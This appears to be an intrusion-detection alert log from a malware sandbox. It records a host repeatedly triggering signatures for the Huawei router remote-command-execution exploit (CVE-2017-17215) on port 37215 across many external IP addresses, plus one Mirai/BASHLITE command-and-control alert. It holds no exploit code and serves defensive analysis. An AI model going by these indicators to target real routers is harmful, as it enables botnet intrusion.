                                            06/14/24-10:44:16.718417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6062037215192.168.2.14156.139.146.203
                                            06/14/24-10:43:45.989766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783237215192.168.2.1441.3.123.162
                                            06/14/24-10:43:48.021516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939637215192.168.2.1441.229.180.96
                                            06/14/24-10:44:33.134552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615837215192.168.2.14197.44.219.54
                                            06/14/24-10:44:14.671264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543037215192.168.2.1441.33.218.163
                                            06/14/24-10:44:00.342908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462637215192.168.2.14197.122.121.28
                                            06/14/24-10:44:20.804157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503437215192.168.2.1441.72.79.10
                                            06/14/24-10:43:36.703214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123237215192.168.2.14156.247.6.235
                                            06/14/24-10:44:16.737191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517237215192.168.2.1441.247.134.250
                                            06/14/24-10:44:10.545368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824637215192.168.2.14197.140.222.184
                                            06/14/24-10:44:20.831406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598437215192.168.2.14156.253.125.86
                                            06/14/24-10:44:22.857554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208037215192.168.2.1441.37.114.45
                                            06/14/24-10:44:24.932732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4672837215192.168.2.1441.156.50.2
                                            06/14/24-10:44:00.343614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342237215192.168.2.14156.19.95.211
                                            06/14/24-10:44:18.764014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124037215192.168.2.1441.182.93.74
                                            06/14/24-10:44:33.133558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553837215192.168.2.14197.48.62.55
                                            06/14/24-10:44:00.343883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745037215192.168.2.14156.218.178.154
                                            06/14/24-10:44:33.152436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253637215192.168.2.14156.250.139.228
                                            06/14/24-10:43:36.729257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658437215192.168.2.14197.171.150.86
                                            06/14/24-10:43:43.943413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949037215192.168.2.1441.203.124.184
                                            06/14/24-10:43:37.760589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4856037215192.168.2.1441.151.148.107
                                            06/14/24-10:44:06.473448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570237215192.168.2.14156.92.14.136
                                            06/14/24-10:44:18.762877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879237215192.168.2.1441.118.233.237
                                            06/14/24-10:44:02.367643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084637215192.168.2.14197.48.127.124
                                            06/14/24-10:44:35.183357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615437215192.168.2.1441.90.150.180
                                            06/14/24-10:44:22.878669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619837215192.168.2.1441.219.19.91
                                            06/14/24-10:43:48.028157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067637215192.168.2.1441.21.39.31
                                            06/14/24-10:44:16.716522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3635837215192.168.2.1441.248.139.209
                                            06/14/24-10:44:31.091243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4384837215192.168.2.14156.169.180.162
                                            06/14/24-10:44:18.775883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728637215192.168.2.14156.79.255.39
                                            06/14/24-10:43:58.291976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489037215192.168.2.14197.118.104.97
                                            06/14/24-10:44:20.830911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938037215192.168.2.1441.160.172.248
                                            06/14/24-10:43:41.910457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295237215192.168.2.14156.182.42.75
                                            06/14/24-10:44:16.734854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636237215192.168.2.1441.167.130.183
                                            06/14/24-10:43:52.146377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370637215192.168.2.1441.115.76.156
                                            06/14/24-10:44:02.365457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193437215192.168.2.14156.24.122.179
                                            06/14/24-10:43:52.164624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691237215192.168.2.1441.246.251.40
                                            06/14/24-10:43:56.242049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703837215192.168.2.1441.211.207.214
                                            06/14/24-10:44:24.915396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671237215192.168.2.14197.104.197.232
                                            06/14/24-10:43:36.701643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5391237215192.168.2.1441.214.90.82
                                            06/14/24-10:44:02.384524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557837215192.168.2.14197.125.219.193
                                            06/14/24-10:44:27.001296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001037215192.168.2.14197.220.206.166
                                            06/14/24-10:43:36.729444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069437215192.168.2.14156.81.47.229
                                            06/14/24-10:44:29.023329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900037215192.168.2.14197.21.203.27
                                            06/14/24-10:43:54.184638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929437215192.168.2.14197.160.178.214
                                            06/14/24-10:43:56.245083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184037215192.168.2.14156.55.149.113
                                            06/14/24-10:44:31.056206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987637215192.168.2.1441.15.64.151
                                            06/14/24-10:44:29.013803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785237215192.168.2.14156.30.154.72
                                            06/14/24-10:44:29.024280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472437215192.168.2.14197.87.211.199
                                            06/14/24-10:44:20.806826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355037215192.168.2.1441.237.76.199
                                            06/14/24-10:44:06.449093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925037215192.168.2.1441.248.100.105
                                            06/14/24-10:44:29.023471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762837215192.168.2.14156.168.27.155
                                            06/14/24-10:44:24.915178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3767437215192.168.2.14156.54.52.221
                                            06/14/24-10:43:52.163518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938637215192.168.2.1441.255.125.157
                                            06/14/24-10:44:18.777898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727837215192.168.2.14197.33.48.92
                                            06/14/24-10:43:39.808715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3408237215192.168.2.14197.244.47.194
                                            06/14/24-10:43:54.185104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5343437215192.168.2.14197.220.122.29
                                            06/14/24-10:44:16.737239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363837215192.168.2.14156.28.144.152
                                            06/14/24-10:44:22.882292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990837215192.168.2.14197.217.50.146
                                            06/14/24-10:43:52.143684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435637215192.168.2.1441.128.96.82
                                            06/14/24-10:44:10.545623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680837215192.168.2.14197.147.234.252
                                            06/14/24-10:44:12.646041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5368037215192.168.2.1441.140.119.181
                                            06/14/24-10:43:34.679275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787837215192.168.2.14197.146.24.147
                                            06/14/24-10:43:53.472391TCP2840516ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message235843243.231.232.101192.168.2.14
                                            06/14/24-10:44:06.453054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098437215192.168.2.14156.168.5.189
                                            06/14/24-10:43:48.021239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838637215192.168.2.1441.144.219.87
                                            06/14/24-10:44:33.134582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860237215192.168.2.14156.148.215.136
                                            06/14/24-10:43:43.971262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4122237215192.168.2.14156.216.29.243
                                            06/14/24-10:43:34.662651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651037215192.168.2.14197.208.58.206
                                            06/14/24-10:44:04.411579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295837215192.168.2.1441.136.184.207
                                            06/14/24-10:44:06.447992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481237215192.168.2.14197.155.112.208
                                            06/14/24-10:43:36.702509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313837215192.168.2.1441.217.92.133
                                            06/14/24-10:44:02.382409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3923437215192.168.2.14197.217.145.108
                                            06/14/24-10:43:52.150324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961637215192.168.2.1441.85.33.47
                                            06/14/24-10:44:18.763051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038637215192.168.2.14156.38.90.82
                                            06/14/24-10:44:20.805790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967237215192.168.2.1441.45.228.40
                                            06/14/24-10:44:24.916361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568837215192.168.2.14156.125.57.103
                                            06/14/24-10:44:31.057191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327437215192.168.2.14156.110.35.164
                                            06/14/24-10:44:02.365029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5804837215192.168.2.14197.34.34.145
                                            06/14/24-10:43:39.808044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972437215192.168.2.1441.164.127.86
                                            06/14/24-10:43:34.675819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688037215192.168.2.1441.39.58.194
                                            06/14/24-10:43:39.811335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126437215192.168.2.1441.213.98.76
                                            06/14/24-10:44:18.763662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686237215192.168.2.14156.2.116.187
                                            06/14/24-10:44:26.978843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544637215192.168.2.14156.199.0.236
                                            06/14/24-10:44:35.178672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891637215192.168.2.1441.195.61.189
                                            06/14/24-10:44:29.015154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4698437215192.168.2.14156.31.222.79
                                            06/14/24-10:44:18.779535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790437215192.168.2.1441.228.92.40
                                            06/14/24-10:44:29.022788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766437215192.168.2.1441.32.51.143
                                            06/14/24-10:43:52.150058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198637215192.168.2.14197.42.255.151
                                            06/14/24-10:44:20.807207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313637215192.168.2.14156.114.186.197
                                            06/14/24-10:43:50.073753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4456237215192.168.2.14156.13.176.72
                                            06/14/24-10:43:36.717107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3705237215192.168.2.1441.100.116.144
                                            06/14/24-10:44:10.568764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071237215192.168.2.14197.211.40.114
                                            06/14/24-10:44:00.324629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3802237215192.168.2.14156.235.125.214
                                            06/14/24-10:44:26.980553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821637215192.168.2.1441.133.72.151
                                            06/14/24-10:44:20.805720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3328237215192.168.2.1441.162.42.96
                                            06/14/24-10:43:39.789773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361837215192.168.2.1441.20.33.144
                                            06/14/24-10:44:04.412349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636437215192.168.2.14156.23.141.234
                                            06/14/24-10:44:20.803873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577237215192.168.2.1441.216.239.104
                                            06/14/24-10:44:33.133324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521437215192.168.2.14156.57.245.22
                                            06/14/24-10:44:04.421816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740037215192.168.2.14156.92.3.175
                                            06/14/24-10:43:34.663470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872037215192.168.2.14156.63.123.182
                                            06/14/24-10:43:45.990711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413837215192.168.2.1441.114.26.35
                                            06/14/24-10:43:41.850178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233237215192.168.2.1441.77.212.152
                                            06/14/24-10:43:36.704390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838837215192.168.2.14197.63.45.83
                                            06/14/24-10:43:58.295236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697837215192.168.2.14156.17.181.179
                                            06/14/24-10:43:43.942119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030637215192.168.2.14156.111.110.67
                                            06/14/24-10:43:41.849802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189037215192.168.2.1441.251.54.239
                                            06/14/24-10:44:18.766810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5781037215192.168.2.1441.63.216.51
                                            06/14/24-10:44:22.879002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876037215192.168.2.14197.90.247.63
                                            06/14/24-10:44:24.917617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446037215192.168.2.1441.251.120.67
                                            06/14/24-10:44:10.543677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980437215192.168.2.14197.246.4.254
                                            06/14/24-10:44:14.688666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056237215192.168.2.1441.23.2.62
                                            06/14/24-10:43:58.273135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311837215192.168.2.14197.175.60.168
                                            06/14/24-10:43:56.243219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355637215192.168.2.14197.254.228.251
                                            06/14/24-10:44:29.023553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5992037215192.168.2.14197.232.98.8
                                            06/14/24-10:43:39.807740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138637215192.168.2.14197.240.19.5
                                            06/14/24-10:43:34.662475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4712437215192.168.2.14197.106.253.26
                                            06/14/24-10:44:20.806088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626637215192.168.2.14156.221.232.144
                                            06/14/24-10:43:34.662368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011237215192.168.2.1441.68.4.247
                                            06/14/24-10:43:48.019663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4498637215192.168.2.1441.86.223.133
                                            06/14/24-10:44:18.775831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824037215192.168.2.1441.82.14.190
                                            06/14/24-10:43:48.021140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762437215192.168.2.14156.173.208.47
                                            06/14/24-10:44:14.681939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917437215192.168.2.14156.205.236.61
                                            06/14/24-10:44:22.862218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3986837215192.168.2.14197.253.150.43
                                            06/14/24-10:44:18.776454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5010837215192.168.2.1441.110.12.167
                                            06/14/24-10:44:29.013983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558237215192.168.2.1441.157.155.61
                                            06/14/24-10:44:00.324910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033437215192.168.2.14156.227.203.129
                                            06/14/24-10:44:00.336602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524637215192.168.2.14197.96.61.132
                                            06/14/24-10:44:10.544270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157237215192.168.2.14197.20.171.77
                                            06/14/24-10:44:16.718951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5655637215192.168.2.14156.127.145.7
                                            06/14/24-10:44:06.452756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4977637215192.168.2.14197.78.178.193
                                            06/14/24-10:43:39.791925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216837215192.168.2.1441.222.183.158
                                            06/14/24-10:44:33.134279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569437215192.168.2.14197.245.222.104
                                            06/14/24-10:44:14.670997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647237215192.168.2.14156.40.18.93
                                            06/14/24-10:44:02.368461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148237215192.168.2.14197.47.122.63
                                            06/14/24-10:43:39.791695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747837215192.168.2.14156.52.112.204
                                            06/14/24-10:44:22.862518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3522837215192.168.2.14156.202.231.103
                                            06/14/24-10:44:14.666047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152437215192.168.2.1441.92.42.196
                                            06/14/24-10:43:39.809931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767637215192.168.2.14156.83.128.43
                                            06/14/24-10:44:16.733595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6039637215192.168.2.1441.151.240.107
                                            06/14/24-10:44:29.013316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446037215192.168.2.14197.28.128.255
                                            06/14/24-10:43:54.186126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197037215192.168.2.14156.189.235.75
                                            06/14/24-10:44:08.504245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729637215192.168.2.14156.62.77.61
                                            06/14/24-10:44:02.383429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835837215192.168.2.14197.103.134.243
                                            06/14/24-10:43:41.846796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726237215192.168.2.1441.191.23.253
                                            06/14/24-10:43:48.020565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257237215192.168.2.1441.113.217.145
                                            06/14/24-10:44:04.420571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778837215192.168.2.14156.73.48.68
                                            06/14/24-10:44:29.027057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546437215192.168.2.14197.62.97.238
                                            06/14/24-10:43:58.277689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327437215192.168.2.14156.99.80.95
                                            06/14/24-10:43:37.759223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599237215192.168.2.1441.84.49.198
                                            06/14/24-10:43:48.029492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112237215192.168.2.14197.240.49.250
                                            06/14/24-10:43:36.723714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064037215192.168.2.14156.186.209.190
                                            06/14/24-10:44:12.618619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659637215192.168.2.14197.157.190.194
                                            06/14/24-10:43:43.941999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544237215192.168.2.14156.193.129.43
                                            06/14/24-10:43:45.968527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554637215192.168.2.14156.201.116.41
                                            06/14/24-10:44:06.451513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700637215192.168.2.14197.216.253.66
                                            06/14/24-10:43:41.906451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322037215192.168.2.14197.227.63.228
                                            06/14/24-10:44:08.518710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033237215192.168.2.14156.3.58.181
                                            06/14/24-10:44:33.133524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985837215192.168.2.1441.136.191.251
                                            06/14/24-10:43:45.988063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637037215192.168.2.14156.134.197.62
                                            06/14/24-10:44:00.344263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928837215192.168.2.14197.131.168.222
                                            06/14/24-10:44:22.858919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267637215192.168.2.1441.94.118.233
                                            06/14/24-10:44:14.685062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774437215192.168.2.14197.108.3.43
                                            06/14/24-10:44:27.002097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620437215192.168.2.14197.79.151.125
                                            06/14/24-10:43:37.760725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453037215192.168.2.1441.213.164.181
                                            06/14/24-10:44:18.767021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547437215192.168.2.14156.23.130.162
                                            06/14/24-10:43:56.229925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899637215192.168.2.14197.215.162.171
                                            06/14/24-10:44:12.641138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324637215192.168.2.14156.103.70.124
                                            06/14/24-10:43:34.676987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786837215192.168.2.1441.166.144.123
                                            06/14/24-10:44:16.716393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552837215192.168.2.14156.109.243.135
                                            06/14/24-10:44:24.915143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660037215192.168.2.14197.157.207.16
                                            06/14/24-10:43:58.290420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4270837215192.168.2.14156.220.142.228
                                            06/14/24-10:44:31.079391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3324837215192.168.2.14197.66.194.21
                                            06/14/24-10:44:06.452805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921237215192.168.2.1441.218.179.250
                                            06/14/24-10:43:43.944747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284237215192.168.2.14156.43.37.91
                                            06/14/24-10:43:43.967774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918237215192.168.2.14156.156.245.110
                                            06/14/24-10:44:00.338345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3856637215192.168.2.14197.159.135.106
                                            06/14/24-10:43:36.724456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065037215192.168.2.14156.22.65.139
                                            06/14/24-10:44:18.762537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570637215192.168.2.14156.180.219.30
                                            06/14/24-10:44:04.407750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5549837215192.168.2.14156.42.207.33
                                            06/14/24-10:44:35.180014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569237215192.168.2.1441.99.89.226
                                            06/14/24-10:44:04.412319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4518837215192.168.2.14197.126.1.247
                                            06/14/24-10:44:06.471414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338437215192.168.2.14156.39.109.40
                                            06/14/24-10:43:52.160455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734437215192.168.2.14197.98.33.87
                                            06/14/24-10:43:36.700909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4632837215192.168.2.14156.194.247.78
                                            06/14/24-10:43:45.988811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5769237215192.168.2.14156.99.139.249
